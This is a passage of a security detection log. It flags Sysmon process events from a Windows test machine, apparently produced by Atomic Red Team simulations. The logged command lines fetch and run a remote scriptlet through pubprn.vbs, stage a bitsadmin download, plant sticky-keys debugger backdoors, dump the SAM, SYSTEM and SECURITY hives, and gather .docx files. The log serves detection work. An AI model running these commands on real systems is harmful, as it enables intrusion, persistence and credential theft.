C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost " script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3668 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + 
+ 2019-07-19 14:48:36.811 + 747F3D96-D844-5D31-0000-001075082F00 + 7140 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost " script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547716.834888,2019-07-19T18:48:36.834888+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3667 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:48:31.222 + 747F3D96-D83F-5D31-0000-00105EF22E00 + 4888 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + 
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547711.157171,2019-07-19T18:48:31.157171+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /resume AtomicBITS" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3665 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:48:31.115 + 747F3D96-D83F-5D31-0000-001001EC2E00 + 3760 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /resume AtomicBITS" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547711.04171,2019-07-19T18:48:31.041710+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /complete AtomicBITS" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3663 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:48:30.995 + 747F3D96-D83E-5D31-0000-001046E52E00 + 4332 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /complete AtomicBITS" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 
747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547710.917348,2019-07-19T18:48:30.917348+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3661 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:48:30.882 + 747F3D96-D83E-5D31-0000-001088DE2E00 + 7072 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547710.807486,2019-07-19T18:48:30.807486+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c 
"bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3659 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:48:30.775 + 747F3D96-D83E-5D31-0000-0010A2D72E00 + 4036 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547807.299766,2019-07-19T18:50:07.299766+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3733 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:50:07.254 + 747F3D96-D89F-5D31-0000-00106C7D3200 + 864 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg add 
" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547807.279972,2019-07-19T18:50:07.279972+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3732 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:50:02.238 + 747F3D96-D89A-5D31-0000-0010F2703200 + 1132 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547802.194097,2019-07-19T18:50:02.194097+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows 
NT\CurrentVersion\Image File Execution "Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3729 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:50:02.144 + 747F3D96-D89A-5D31-0000-0010A46B3200 + 1228 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547802.174886,2019-07-19T18:50:02.174886+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3728 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:52.263 + 747F3D96-D890-5D31-0000-001085443200 + 4316 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + 
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547792.275626,2019-07-19T18:49:52.275626+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "for /R c: %%f in (*.docx) do copy %%f c:\temp\" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3727 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:52.202 + 747F3D96-D890-5D31-0000-0010FA3F3200 + 1568 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "for /R c: %%f in (*.docx) do copy %%f c:\temp\" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547792.053916,2019-07-19T18:49:52.053916+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /S /D /c" dir c: /b /s .docx " ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3725 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:52.011 + 
747F3D96-D890-5D31-0000-001012383200 + 608 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + C:\Windows\system32\cmd.exe /S /D /c" dir c: /b /s .docx " + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D88F-5D31-0000-0010BD353200 + 2780 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "dir c: /b /s .docx | findstr /e .docx" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547792.048002,2019-07-19T18:49:52.048002+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "dir c: /b /s .docx | findstr /e .docx" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3724 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:51.971 + 747F3D96-D88F-5D31-0000-0010BD353200 + 2780 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "dir c: /b /s .docx | findstr /e .docx" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line 
Interface,1563547791.99625,2019-07-19T18:49:51.996250+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3723 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:43.520 + 747F3D96-D887-5D31-0000-0010D51F3200 + 752 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547781.691049,2019-07-19T18:49:41.691049+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg save HKLM\SAM sam.hive" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3721 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:41.646 + 747F3D96-D885-5D31-0000-00107F1A3200 + 2832 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg save HKLM\SAM sam.hive" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + 
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547779.255338,2019-07-19T18:49:39.255338+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg save HKLM\System system.hive" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3719 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:39.214 + 747F3D96-D883-5D31-0000-0010839B3100 + 3904 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg save HKLM\System system.hive" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547773.63255,2019-07-19T18:49:33.632550+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg save HKLM\Security security.hive" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3717 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:33.603 + 
747F3D96-D87D-5D31-0000-0010958F3100 + 1728 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg save HKLM\Security security.hive" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547773.572021,2019-07-19T18:49:33.572021+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3715 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:33.541 + 747F3D96-D87D-5D31-0000-0010FA8A3100 + 3868 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] 
Command-Line Interface,1563547773.392501,2019-07-19T18:49:33.392501+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3713 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:33.365 + 747F3D96-D87D-5D31-0000-0010CA843100 + 3900 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547773.331942,2019-07-19T18:49:33.331942+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3711 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:33.284 + 747F3D96-D87D-5D31-0000-00103B803100 + 324 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg query 
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547773.251689,2019-07-19T18:49:33.251689+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3709 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:33.209 + 747F3D96-D87D-5D31-0000-0010B37B3100 + 3616 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + 